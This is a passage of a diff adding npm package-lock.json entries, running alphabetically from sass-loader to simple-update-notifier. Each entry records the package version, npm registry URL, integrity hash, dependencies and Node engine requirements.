"sass": "sass.js" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/sass-loader": { + "version": "14.2.1", + "resolved": "https://registry.npmjs.org/sass-loader/-/sass-loader-14.2.1.tgz", + "integrity": "sha512-G0VcnMYU18a4N7VoNDegg2OuMjYtxnqzQWARVWCIVSZwJeiL9kg8QMsuIZOplsJgTzZLF6jGxI3AClj8I9nRdQ==", + "dev": true, + "dependencies": { + "neo-async": "^2.6.2" + }, + "engines": { + "node": ">= 18.12.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "@rspack/core": "0.x || 1.x", + "node-sass": "^4.0.0 || ^5.0.0 || ^6.0.0 || ^7.0.0 || ^8.0.0 || ^9.0.0", + "sass": "^1.3.0", + "sass-embedded": "*", + "webpack": "^5.0.0" + }, + "peerDependenciesMeta": { + "@rspack/core": { + "optional": true + }, + "node-sass": { + "optional": true + }, + "sass": { + "optional": true + }, + "sass-embedded": { + "optional": true + }, + "webpack": { + "optional": true + } + } + }, + "node_modules/sax": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/sax/-/sax-1.2.1.tgz", + "integrity": "sha1-e45lYZCyKOgaZq6nSEgNgozS03o=" + }, + "node_modules/saxes": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/saxes/-/saxes-5.0.1.tgz", + "integrity": "sha512-5LBh1Tls8c9xgGjw3QrMwETmTMVk0oFgvrFSvWx62llR2hcEInrKNZ2GZCCuuy2lvWrdl5jhbpeqc5hRYKFOcw==", + "dev": true, + "dependencies": { + "xmlchars": "^2.2.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/scheduler": { + "version": "0.20.2", + "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.20.2.tgz", + "integrity": "sha512-2eWfGgAqqWFGqtdMmcL5zCMK1U8KlXv8SQFGglL3CEtd0aDVDWgeF/YoCmvln55m5zSk3J/20hTaSBeSObsQDQ==", + "dependencies": { + "loose-envify": "^1.1.0", + "object-assign": "^4.1.1" + } + }, + "node_modules/schema-utils": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-3.3.0.tgz", + "integrity": "sha512-pN/yOAvcC+5rQ5nERGuwrjLlYvLTbCibnZ1I7B1LaiAz9BRBlE9GMgE/eqV30P7aJQUf7Ddimy/RsbYO/GrVGg==", + "dev": true, + "dependencies": { + "@types/json-schema": "^7.0.8", + "ajv": "^6.12.5", + "ajv-keywords": "^3.5.2" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/scroll-into-view-if-needed": { + "version": "2.2.28", + "resolved": "https://registry.npmjs.org/scroll-into-view-if-needed/-/scroll-into-view-if-needed-2.2.28.tgz", + "integrity": "sha512-8LuxJSuFVc92+0AdNv4QOxRL4Abeo1DgLnGNkn1XlaujPH/3cCFz3QI60r2VNu4obJJROzgnIUw5TKQkZvZI1w==", + "dev": true, + "dependencies": { + "compute-scroll-into-view": "^1.0.17" + } + }, + "node_modules/select-hose": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/select-hose/-/select-hose-2.0.0.tgz", + "integrity": "sha512-mEugaLK+YfkijB4fx0e6kImuJdCIt2LxCRcbEYPqRGCs4F2ogyfZU5IAZRdjCP8JPq2AtdNoC/Dux63d9Kiryg==", + "dev": true, + "license": "MIT" + }, + "node_modules/selfsigned": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/selfsigned/-/selfsigned-2.4.1.tgz", + "integrity": "sha512-th5B4L2U+eGLq1TVh7zNRGBapioSORUeymIydxgFpwww9d2qyKvtuPU2jJuHvYAwwqi2Y596QBL3eEqcPEYL8Q==", + "dependencies": { + "@types/node-forge": "^1.3.0", + "node-forge": "^1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/semver": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", + "integrity": 
"sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "dev": true, + "bin": { + "semver": "bin/semver.js" + } + }, + "node_modules/send": { + "version": "0.19.0", + "resolved": "https://registry.npmjs.org/send/-/send-0.19.0.tgz", + "integrity": "sha512-dW41u5VfLXu8SJh5bwRmyYUbAoSB3c9uQh6L8h/KtsFREPWpbX1lrljJo186Jc4nmci/sGUZ9a0a0J2zgfq2hw==", + "dependencies": { + "debug": "2.6.9", + "depd": "2.0.0", + "destroy": "1.2.0", + "encodeurl": "~1.0.2", + "escape-html": "~1.0.3", + "etag": "~1.8.1", + "fresh": "0.5.2", + "http-errors": "2.0.0", + "mime": "1.6.0", + "ms": "2.1.3", + "on-finished": "2.4.1", + "range-parser": "~1.2.1", + "statuses": "2.0.1" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/send/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/send/node_modules/debug/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==" + }, + "node_modules/send/node_modules/depd": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/send/node_modules/mime": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/mime/-/mime-1.6.0.tgz", + "integrity": "sha512-x0Vn8spI+wuJ1O6S7gnbaQg8Pxh4NNHb7KSINmEWKiPE4RKOplvijn+NkmYmmRgP68mc70j2EbeTFRsrswaQeg==", + "bin": { + "mime": "cli.js" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/send/node_modules/on-finished": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz", + "integrity": "sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg==", + "dependencies": { + "ee-first": "1.1.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/send/node_modules/statuses": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/statuses/-/statuses-2.0.1.tgz", + "integrity": "sha512-RwNA9Z/7PrK06rYLIzFMlaF+l73iwpzsqRIFgbMLbTcLD6cOao82TaWefPXQvB2fOC4AjuYSEndS7N/mTCbkdQ==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/sequelize": { + "version": "6.31.0", + "resolved": "https://registry.npmjs.org/sequelize/-/sequelize-6.31.0.tgz", + "integrity": "sha512-nCPVtv+QydBmb3Us2jCNAr1Dx3gST83VZxxrUQn/JAVFCOrmYOgUaPUz5bevummyNf30zfHsZhIKYAOD3ULfTA==", + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/sequelize" + } + ], + "dependencies": { + "@types/debug": "^4.1.7", + "@types/validator": "^13.7.1", + "debug": "^4.3.3", + "dottie": "^2.0.2", + "inflection": "^1.13.2", + "lodash": "^4.17.21", + "moment": "^2.29.1", + "moment-timezone": "^0.5.35", + "pg-connection-string": "^2.5.0", + "retry-as-promised": "^7.0.3", + "semver": "^7.3.5", + "sequelize-pool": "^7.1.0", + "toposort-class": "^1.0.1", + "uuid": "^8.3.2", + "validator": "^13.7.0", + "wkx": "^0.5.0" + }, + "engines": { + "node": ">=10.0.0" + }, + "peerDependenciesMeta": { + "ibm_db": { + "optional": true + }, + "mariadb": { + "optional": true + }, + "mysql2": { + "optional": true + }, + 
"oracledb": { + "optional": true + }, + "pg": { + "optional": true + }, + "pg-hstore": { + "optional": true + }, + "snowflake-sdk": { + "optional": true + }, + "sqlite3": { + "optional": true + }, + "tedious": { + "optional": true + } + } + }, + "node_modules/sequelize-cli": { + "version": "6.6.0", + "resolved": "https://registry.npmjs.org/sequelize-cli/-/sequelize-cli-6.6.0.tgz", + "integrity": "sha512-FwTClhGRvXKanFRHMZbgfXOBV8UC2B3VkE0WOdW1n39/36PF4lWyurF95f246une/V4eaO3a7/Ywvy++3r+Jmg==", + "dev": true, + "dependencies": { + "cli-color": "^2.0.3", + "fs-extra": "^9.1.0", + "js-beautify": "^1.14.5", + "lodash": "^4.17.21", + "resolve": "^1.22.1", + "umzug": "^2.3.0", + "yargs": "^16.2.0" + }, + "bin": { + "sequelize": "lib/sequelize", + "sequelize-cli": "lib/sequelize" + }, + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/sequelize-cli/node_modules/fs-extra": { + "version": "9.1.0", + "resolved": "https://registry.npmjs.org/fs-extra/-/fs-extra-9.1.0.tgz", + "integrity": "sha512-hcg3ZmepS30/7BSFqRvoo3DOMQu7IjqxO5nCDt+zM9XWjb33Wg7ziNT+Qvqbuc3+gWpzO02JubVyk2G4Zvo1OQ==", + "dev": true, + "dependencies": { + "at-least-node": "^1.0.0", + "graceful-fs": "^4.2.0", + "jsonfile": "^6.0.1", + "universalify": "^2.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/sequelize-cli/node_modules/yargs": { + "version": "16.2.0", + "resolved": "https://registry.npmjs.org/yargs/-/yargs-16.2.0.tgz", + "integrity": "sha512-D1mvvtDG0L5ft/jGWkLpG1+m0eQxOfaBvTNELraWj22wSVUMWxZUvYgJYcKh6jGGIkJFhH4IZPQhR4TKpc8mBw==", + "dev": true, + "dependencies": { + "cliui": "^7.0.2", + "escalade": "^3.1.1", + "get-caller-file": "^2.0.5", + "require-directory": "^2.1.1", + "string-width": "^4.2.0", + "y18n": "^5.0.5", + "yargs-parser": "^20.2.2" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/sequelize-pool": { + "version": "7.1.0", + "resolved": "https://registry.npmjs.org/sequelize-pool/-/sequelize-pool-7.1.0.tgz", + "integrity": "sha512-G9c0qlIWQSK29pR/5U2JF5dDQeqqHRragoyahj/Nx4KOOQ3CPPfzxnfqFPCSB7x5UgjOgnZ61nSxz+fjDpRlJg==", + "engines": { + "node": ">= 10.0.0" + } + }, + "node_modules/sequelize/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/sequelize/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/sequelize/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/sequelize/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/serialize-javascript": { + "version": "6.0.2", + "resolved": 
"https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-6.0.2.tgz", + "integrity": "sha512-Saa1xPByTTq2gdeFZYLLo+RFE35NHZkAbqZeWNd3BpzppeVisAqpDjcp8dyf6uIvEqJRd46jemmyA4iFIeVk8g==", + "dev": true, + "license": "BSD-3-Clause", + "dependencies": { + "randombytes": "^2.1.0" + } + }, + "node_modules/serialize-javascript/node_modules/randombytes": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/randombytes/-/randombytes-2.1.0.tgz", + "integrity": "sha512-vYl3iOX+4CKUWuxGi9Ukhie6fsqXqS9FE2Zaic4tNFD2N2QQaXOMFbuKK4QmDHC0JO6B1Zp41J0LpT0oR68amQ==", + "dev": true, + "dependencies": { + "safe-buffer": "^5.1.0" + } + }, + "node_modules/serve-index": { + "version": "1.9.1", + "resolved": "https://registry.npmjs.org/serve-index/-/serve-index-1.9.1.tgz", + "integrity": "sha512-pXHfKNP4qujrtteMrSBb0rc8HJ9Ms/GrXwcUtUtD5s4ewDJI8bT3Cz2zTVRMKtri49pLx2e0Ya8ziP5Ya2pZZw==", + "dev": true, + "license": "MIT", + "dependencies": { + "accepts": "~1.3.4", + "batch": "0.6.1", + "debug": "2.6.9", + "escape-html": "~1.0.3", + "http-errors": "~1.6.2", + "mime-types": "~2.1.17", + "parseurl": "~1.3.2" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/serve-index/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/serve-index/node_modules/http-errors": { + "version": "1.6.3", + "resolved": "https://registry.npmjs.org/http-errors/-/http-errors-1.6.3.tgz", + "integrity": "sha512-lks+lVC8dgGyh97jxvxeYTWQFvh4uw4yC12gVl63Cg30sjPX4wuGcdkICVXDAESr6OJGjqGA8Iz5mkeN6zlD7A==", + "dev": true, + "license": "MIT", + "dependencies": { + "depd": "~1.1.2", + "inherits": "2.0.3", + "setprototypeof": "1.1.0", + "statuses": ">= 1.4.0 < 2" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/serve-index/node_modules/inherits": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.3.tgz", + "integrity": "sha512-x00IRNXNy63jwGkJmzPigoySHbaqpNuzKbBOmzK+g2OdZpQ9w+sxCN+VSB3ja7IAge2OP2qpfxTjeNcyjmW1uw==", + "dev": true, + "license": "ISC" + }, + "node_modules/serve-index/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==", + "dev": true, + "license": "MIT" + }, + "node_modules/serve-index/node_modules/setprototypeof": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.1.0.tgz", + "integrity": "sha512-BvE/TwpZX4FXExxOxZyRGQQv651MSwmWKZGqvmPcRIjDqWub67kTKuIMx43cZZrS/cBBzwBcNDWoFxt2XEFIpQ==", + "dev": true, + "license": "ISC" + }, + "node_modules/serve-static": { + "version": "1.16.2", + "resolved": "https://registry.npmjs.org/serve-static/-/serve-static-1.16.2.tgz", + "integrity": "sha512-VqpjJZKadQB/PEbEwvFdO43Ax5dFBZ2UECszz8bQ7pi7wt//PWe1P6MN7eCnjsatYtBT6EuiClbjSWP2WrIoTw==", + "dependencies": { + "encodeurl": "~2.0.0", + "escape-html": "~1.0.3", + "parseurl": "~1.3.3", + "send": "0.19.0" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/serve-static/node_modules/encodeurl": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/encodeurl/-/encodeurl-2.0.0.tgz", + "integrity": 
"sha512-Q0n9HRi4m6JuGIV1eFlmvJB7ZEVxu93IrMyiMsGC0lrMJMWzRgx6WGquyfQgZVb31vhGgXnfmPNNXmxnOkRBrg==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/set-blocking": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", + "integrity": "sha1-BF+XgtARrppoA93TgrJDkrPYkPc=" + }, + "node_modules/set-cookie-parser": { + "version": "2.6.0", + "resolved": "https://registry.npmjs.org/set-cookie-parser/-/set-cookie-parser-2.6.0.tgz", + "integrity": "sha512-RVnVQxTXuerk653XfuliOxBP81Sf0+qfQE73LIYKcyMYHG94AuH0kgrQpRDuTZnSmjpysHmzxJXKNfa6PjFhyQ==", + "dev": true + }, + "node_modules/set-function-length": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/set-function-length/-/set-function-length-1.2.2.tgz", + "integrity": "sha512-pgRc4hJ4/sNjWCSS9AmnS40x3bNMDTknHgL5UaMBTMyJnU90EgWh1Rz+MC9eFu4BuN/UwZjKQuY/1v3rM7HMfg==", + "dependencies": { + "define-data-property": "^1.1.4", + "es-errors": "^1.3.0", + "function-bind": "^1.1.2", + "get-intrinsic": "^1.2.4", + "gopd": "^1.0.1", + "has-property-descriptors": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/set-function-name": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/set-function-name/-/set-function-name-2.0.1.tgz", + "integrity": "sha512-tMNCiqYVkXIZgc2Hnoy2IvC/f8ezc5koaRFkCjrpWzGpCd3qbZXPzVy9MAZzK1ch/X0jvSkojys3oqJN0qCmdA==", + "dependencies": { + "define-data-property": "^1.0.1", + "functions-have-names": "^1.2.3", + "has-property-descriptors": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/set-value": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/set-value/-/set-value-2.0.1.tgz", + "integrity": "sha512-JxHc1weCN68wRY0fhCoXpyK55m/XPHafOmK4UWD7m2CI14GMcFypt4w/0+NV5f/ZMby2F6S2wwA7fgynh9gWSw==", + "dev": true, + "dependencies": { + "extend-shallow": "^2.0.1", + "is-extendable": "^0.1.1", + "is-plain-object": "^2.0.3", + "split-string": "^3.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/set-value/node_modules/extend-shallow": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/extend-shallow/-/extend-shallow-2.0.1.tgz", + "integrity": "sha512-zCnTtlxNoAiDc3gqY2aYAWFx7XWWiasuF2K8Me5WbN8otHKTUKBwjPtNpRs/rbUZm7KxWAaNj7P1a/p52GbVug==", + "dev": true, + "dependencies": { + "is-extendable": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/set-value/node_modules/is-extendable": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/is-extendable/-/is-extendable-0.1.1.tgz", + "integrity": "sha512-5BMULNob1vgFX6EjQw5izWDxrecWK9AM72rugNr0TFldMOi0fj6Jk+zeKIt0xGj4cEfQIJth4w3OKWOJ4f+AFw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/setprototypeof": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.2.0.tgz", + "integrity": "sha512-E5LDX7Wrp85Kil5bhZv46j8jOeboKq5JMmYM3gVGdGH8xFpPWXUMsNrlODCrkoxMEeNi/XZIwuRvY4XNwYMJpw==" + }, + "node_modules/sha.js": { + "version": "2.4.11", + "resolved": "https://registry.npmjs.org/sha.js/-/sha.js-2.4.11.tgz", + "integrity": "sha512-QMEp5B7cftE7APOjk5Y6xgrbWu+WkLVQwk8JNjZ8nKRciZaByEW6MubieAiToS7+dwvrjGhH8jRXz3MVd0AYqQ==", + "dev": true, + "license": "(MIT AND BSD-3-Clause)", + "dependencies": { + "inherits": "^2.0.1", + "safe-buffer": "^5.0.1" + }, + "bin": { + "sha.js": "bin.js" + } + }, + "node_modules/shallow-clone": { + "version": "3.0.1", + "resolved": 
"https://registry.npmjs.org/shallow-clone/-/shallow-clone-3.0.1.tgz", + "integrity": "sha512-/6KqX+GVUdqPuPPd2LxDDxzX6CAbjJehAAOKlNpqqUpAqPM6HeL8f+o3a+JsyGjn2lv0WY8UsTgUJjU9Ok55NA==", + "dev": true, + "dependencies": { + "kind-of": "^6.0.2" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/shallow-equal": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/shallow-equal/-/shallow-equal-3.1.0.tgz", + "integrity": "sha512-pfVOw8QZIXpMbhBWvzBISicvToTiM5WBF1EeAUZDDSb5Dt29yl4AYbyywbJFSEsRUMr7gJaxqCdr4L3tQf9wVg==" + }, + "node_modules/shebang-command": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", + "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "dependencies": { + "shebang-regex": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/shebang-regex": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", + "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", + "engines": { + "node": ">=8" + } + }, + "node_modules/shell-quote": { + "version": "1.8.2", + "resolved": "https://registry.npmjs.org/shell-quote/-/shell-quote-1.8.2.tgz", + "integrity": "sha512-AzqKpGKjrj7EM6rKVQEPpB288oCfnrEIuyoT9cyF4nmGa7V8Zk6f7RRqYisX8X9m+Q7bd632aZW4ky7EhbQztA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/shimmer": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/shimmer/-/shimmer-1.2.1.tgz", + "integrity": "sha512-sQTKC1Re/rM6XyFM6fIAGHRPVGvyXfgzIDvzoq608vM+jeyVD0Tu1E6Np0Kc2zAIFWIj963V2800iF/9LPieQw==" + }, + "node_modules/side-channel": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/side-channel/-/side-channel-1.0.6.tgz", + "integrity": "sha512-fDW/EZ6Q9RiO8eFG8Hj+7u/oW+XrPTIChwCOM2+th2A6OblDtYYIpve9m+KvI9Z4C9qSEXlaGR6bTEYHReuglA==", + "dependencies": { + "call-bind": "^1.0.7", + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.4", + "object-inspect": "^1.13.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/sift": { + "version": "17.1.3", + "resolved": "https://registry.npmjs.org/sift/-/sift-17.1.3.tgz", + "integrity": "sha512-Rtlj66/b0ICeFzYTuNvX/EF1igRbbnGSvEyT79McoZa/DeGhMyC5pWKOEsZKnpkqtSeovd5FL/bjHWC3CIIvCQ==", + "license": "MIT" + }, + "node_modules/sigmund": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/sigmund/-/sigmund-1.0.1.tgz", + "integrity": "sha512-fCvEXfh6NWpm+YSuY2bpXb/VIihqWA6hLsgboC+0nl71Q7N7o2eaCW8mJa/NLvQhs6jpd3VZV4UiUQlV6+lc8g==", + "dev": true + }, + "node_modules/signal-exit": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", + "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==" + }, + "node_modules/simple-concat": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/simple-concat/-/simple-concat-1.0.1.tgz", + "integrity": "sha512-cSFtAPtRhljv69IK0hTVZQ+OfE9nePi/rtJmw5UjHeVyVroEqJXP1sFztKUy1qU+xvz3u/sfYJLa947b7nAN2Q==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": 
"https://feross.org/support" + } + ] + }, + "node_modules/simple-get": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/simple-get/-/simple-get-3.1.1.tgz", + "integrity": "sha512-CQ5LTKGfCpvE1K0n2us+kuMPbk/q0EKl82s4aheV9oXjFEz6W/Y7oQFVJuU6QG77hRT4Ghb5RURteF5vnWjupA==", + "dev": true, + "optional": true, + "peer": true, + "dependencies": { + "decompress-response": "^4.2.0", + "once": "^1.3.1", + "simple-concat": "^1.0.0" + } + }, + "node_modules/simple-get/node_modules/decompress-response": { + "version": "4.2.1", + "resolved": "https://registry.npmjs.org/decompress-response/-/decompress-response-4.2.1.tgz", + "integrity": "sha512-jOSne2qbyE+/r8G1VU+G/82LBs2Fs4LAsTiLSHOCOMZQl2OKZ6i8i4IyHemTe+/yIXOtTcRQMzPcgyhoFlqPkw==", + "dev": true, + "optional": true, + "peer": true, + "dependencies": { + "mimic-response": "^2.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/simple-get/node_modules/mimic-response": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/mimic-response/-/mimic-response-2.1.0.tgz", + "integrity": "sha512-wXqjST+SLt7R009ySCglWBCFpjUygmCIfD790/kVbiGmUgfYGuB14PiTd5DwVxSV4NcYHjzMkoj5LjQZwTQLEA==", + "dev": true, + "optional": true, + "peer": true, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/simple-oauth2": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/simple-oauth2/-/simple-oauth2-5.0.0.tgz", + "integrity": "sha512-8291lo/z5ZdpmiOFzOs1kF3cxn22bMj5FFH+DNUppLJrpoIlM1QnFiE7KpshHu3J3i21TVcx4yW+gXYjdCKDLQ==", + "dependencies": { + "@hapi/hoek": "^10.0.1", + "@hapi/wreck": "^18.0.0", + "debug": "^4.3.4", + "joi": "^17.6.4" + } + }, + "node_modules/simple-oauth2/node_modules/@hapi/hoek": { + "version": "10.0.1", + "resolved": "https://registry.npmjs.org/@hapi/hoek/-/hoek-10.0.1.tgz", + "integrity": "sha512-CvlW7jmOhWzuqOqiJQ3rQVLMcREh0eel4IBnxDx2FAcK8g7qoJRQK4L1CPBASoCY6y8e6zuCy3f2g+HWdkzcMw==" + }, + "node_modules/simple-oauth2/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/simple-oauth2/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/simple-update-notifier": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/simple-update-notifier/-/simple-update-notifier-2.0.0.tgz", + "integrity": "sha512-a2B9Y0KlNXl9u/vsW6sTIu9vGEpfKu2wRV6l1H3XEas/0gUIzGzBoP/IouTcUQbm9JWZLH3COxyn03TYlFax6w==", + "dev": true, + "dependencies": { + "semver": "^7.5.3" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/simple-update-notifier/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dev": true, + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/simple-update-notifier/node_modules/semver": { + "version": "7.5.4", + "resolved": 
